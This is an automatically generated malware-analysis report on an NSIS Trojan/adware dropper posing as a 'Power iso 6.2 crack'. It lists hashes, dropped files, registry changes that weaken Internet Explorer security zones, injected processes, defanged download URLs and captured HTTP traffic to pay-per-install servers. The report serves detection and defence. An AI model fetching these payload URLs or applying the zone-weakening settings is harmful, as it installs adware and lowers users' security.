Trojan.NSIS.StartPage_9e3487f910
not-a-virus:AdWare.Win32.AdLoad.jumk (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 9e3487f91086d9bb05846dc5cc902d17
SHA1: 4a1b38b6c2581c4c4382f37cc19c3fc3403c5562
SHA256: 5ee44f559729304477c20567dc2791578dbba541d23258ae3eea7c5e0d04d015
SSDeep: 49152:42GmH9ut5iywBn1gqJNA9EkRUELfy6ZXYBUt4MUO5f3d2wS8Cq8c3ab:42HH8iyKCjekfXYB6xZJd2wq ab
Size: 2739836 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: UltraVnc
Created at: 2012-02-24 21:20:04
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
OoRnTsSavW.exe:1620
%original file name%.exe:276
cpSetup.exe:1136
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process OoRnTsSavW.exe:1620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\752024497 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\cpSetup.exe (4568 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3.tmp (0 bytes)
The process %original file name%.exe:276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\EYogau3uc3 (147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\OoRnTsSavW.exe (11558 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1.tmp (0 bytes)
The process cpSetup.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\00080d09.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf6.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000811bc.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll (784 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
Registry activity
The process OoRnTsSavW.exe:1620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 AD BB CF 4D 57 72 14 97 C5 C3 5F 74 1E 12 0F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 6B F2 C2 9E 20 3F 16 8C F5 F0 D8 04 BB D2 A7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 D9 A1 5F 0B 0F 8E C4 A0 7D A9 F3 A8 AD 33 82"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 3933f341d25c3adcc2a4af2d526f300b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00080d09.a |
| 75afe79cb25593a8b5a3e8237332293f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\000811bc.a |
| 7070aa0e2e0cd288c58a45d14ddbf9b8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf7.tmp\b61595bf-da45-4e15-927c-f49de52b0e6d.dll |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\NSISdl.dll |
| 782f8725c3577f209e8204d4e1471d32 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\OoRnTsSavW.exe |
| bf712f32249029466fa86756f5546950 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\System.dll |
| 7caaf58a526da33c24cbe122e7839693 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\NSISdl.dll |
| df4bceea67fc36290031d27449198809 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\cpSetup.exe |
| 89d40ecddf3ce6f3b0e6a84f40936912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy4.tmp\nsArray.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 29324 | 29696 | 4.50526 | 419d4e1be1ac35a5db9c47f553b27cea |
| .rdata | 36864 | 11118 | 11264 | 3.11773 | cca1ca3fbf99570f6de9b43ce767f368 |
| .data | 49152 | 469916 | 512 | 1.25109 | 77f0839f8ebea31040e462523e1c770e |
| .ndata | 520192 | 610304 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 1130496 | 47400 | 47616 | 3.15408 | 312125ac025ba47ff831384ba4deeaf2 |
| .reloc | 1179648 | 4054 | 4096 | 1.26213 | ef990ecbd954c165f9157ea47cf201cc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4422016&pid=1505&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMwODE1QkFQXQ==&b_typ=pe | |
| hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP] | |
| hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic= | |
| hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13 | |
| hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=13&aff_sub=1505&aff_sub2=4422016&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.ic-int-34.xyz/offer.php?affId={aff_id}&trackingId=1542762&instId=13&ho_trackingid={transaction_id}&cc=UA | |
| hxxp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA | |
| hxxp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA | |
| hxxp://up.ic-int-99.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA | |
| hxxp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 | |
| hxxp://get.int-cp3-234.xyz/launch_reb.php?p=sevenzip&tid=4422016&pid=1505&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMwODE1QkFQXQ==&b_typ=pe | |
| hxxp://up.int-ic-4.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic= | |
| hxxp://get.ic-dri-76.xyz/?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13 | |
| hxxp://dl.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP] | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake FireFox Version 2.
Traffic
GET hXXp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA HTTP/1.1
Host: up.ic-int-34.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 28712
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 16 Sep 2015 23:18:24 GMT
X-Cache: Miss from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RFq7p9AzAn96XsJ0Qb55p6zCm-_pdtSz6SvYNs8QTIs3PaZ2BIHMRw==
GET /?affId=1006&appTitle=Power%20iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13 HTTP/1.0
Host: get.ic-dri-76.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 52213
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Wed, 16 Sep 2015 23:18:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 13be6f06029966b75af2e6bcb4d1867a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FEGqC1gw2nrKOWD_X24amgqAYDJZxtpi22d6Qy2D7REKd7wLTloftQ==
GET /launch_reb.php?p=sevenzip&tid=4422016&pid=1505&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMwODE1QkFQXQ==&b_typ=pe HTTP/1.0
Host: get.int-cp3-234.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 147
Connection: close
Date: Wed, 16 Sep 2015 23:18:10 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 f7cf1cf41b6eacdcf79cd9a0aa1d0179.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CyqaPuD5_zXOlysnILYT0_wBOokAqd5UwAjtGJY_E8sIszJL1OAWgQ==
s=first
u=hXXp://dl.ic-free.xyz/stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP]
GET hXXp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1
Host: up.ic-int-34.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 409128
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Wed, 16 Sep 2015 23:18:24 GMT
X-Cache: Miss from cloudfront
Via: 1.1 9c639fa8cc4e8890b24d42b79b84df74.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IX-JycLt28ASgApPKR5kLt8tcgEfE1tyPMfZqfp7VbYc9Ozdn-aQdg==
GET /stub_maker.php?program=sevenzip&tid=4422016&pid=1505&b_typ=pe&reb=1&name=Power iso 6.2 final crack [230815BAP] HTTP/1.0
Host: dl.ic-free.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 75780
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55f9f8a7af72c.exe"
X-Powered-By: ASP.NET
Date: Wed, 16 Sep 2015 23:17:59 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e24fef4a7b03bd84e1e8d57f2471a84d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GG6UfCTsiA_ogJ4-QKKwvXAple38bBiiFvPyY_mokKkkXnNXfpZYVA==
GET /launch_v5.php?p=sevenzip&pid=1505&tid=4422016&b_typ=pe&n=UG93ZXIgaXNvIDYuMiBmaW5hbCBjcmFjayBbMjMw&reb=1&ic= HTTP/1.0
Host: up.int-ic-4.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1694
Connection: close
Date: Wed, 16 Sep 2015 23:18:12 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BmgjpRaBJJ72FLrvQMsGXr98cAgZ9LGn2xPeFvdYpbjaQ9fT3-pSpg==
files=1
t1=dl
u1=hXXp://get.ic-dri-76.xyz/?affId=1006&appTitle=Power%2520iso%206.2%20final%20crack%20%5B230&s1=1505&s2=4422016&setupName=cpSetup&appVersion=2.92&instId=13
n1=cpSetup.exe
b1=cp
c1=sevenzip-1
s1=0
t2=dl
u2=hXXp://do.dabado-34.xyz/stub_maker_ua.php?url=http://get.file136desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4422016&d2%3D1505&dynamicname=Power%20iso%206.2%20final%20crack%20%255B230
n2=setup-1228.exe
b2=ru
c2=sevenzip-2
s2=0
t3=dl
u3=hXXp://www.amonisto.org/download.php?version=1.1.5.26&campid=2140&instid[appname]=&instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu%3Dam&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com%2Fimg/icon_installer.png&prefix=Setup&instid[thankyoupage]=
n3=Setup__2140_il228.exe
b3=am
c3=2140-sevenzip
s3=0
t4=dl
u4=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Power%20iso%206.2%20final%20crack%20%5B230&producturl=http:/%2Fd3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4422016
n4=SevenZip-apset.exe
b4=ap
c4=sevenzip
s4=0
t5=dl
u5=hXXp://sub.spirlymo.com/installers/cli/14<<< skipped >>>
POST hXXp://up.ic-int-99.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA HTTP/1.1
Host: up.ic-int-99.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 16 Sep 2015 23:18:24 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=13&aff_sub=1505&aff_sub2=4422016&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.ic-int-34.xyz/offer.php?affId={aff_id}&trackingId=1542762&instId=13&ho_trackingid={transaction_id}&cc=UA HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 16 Sep 2015 23:18:16 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02414-102a59674e2aa97a57cdd16e9672fc-1006-4-0-0-0-0-UA-2-3133-31353035-34343232303136-30-30-30-194.242.96.218-20150916191816-_-7B11052C012208017E2C314C091A2D4425345F124F02015B1C1F4246271F1621094249011631144801; expires=Fri, 16 Oct 2015 23:18:16 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 11 Aug 2018 09:58:16 GMT; path=/;
tracking_id: 102a59674e2aa97a57cdd16e9672fc
X-Robots-Tag: noindex, nofollow
Content-Length: 324
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://up.ic-int-34.xyz/offer.php?affId=1006&trackingId=1542762&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&cc=UA">here</a>.</p>
</body></html>
<<< skipped >>>
POST hXXp://up.ic-int-34.xyz/installer.php?affId=1006&instId=13&ho_trackingid=102a59674e2aa97a57cdd16e9672fc&trackingId=1542762&cc=UA HTTP/1.1
Host: up.ic-int-34.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded
id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Wed, 16 Sep 2015 23:18:17 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2s5DXzxCejwv7P75bcradWM4VWjjQ74qdTAbUJmU7LNg02dVD2UQFg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: 2s5DXzxCejwv7P75bcradWM4VWjjQ74qdTAbUJmU7LNg02dVD2UQFg==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
.reloc
System.dll
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
.uy}"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
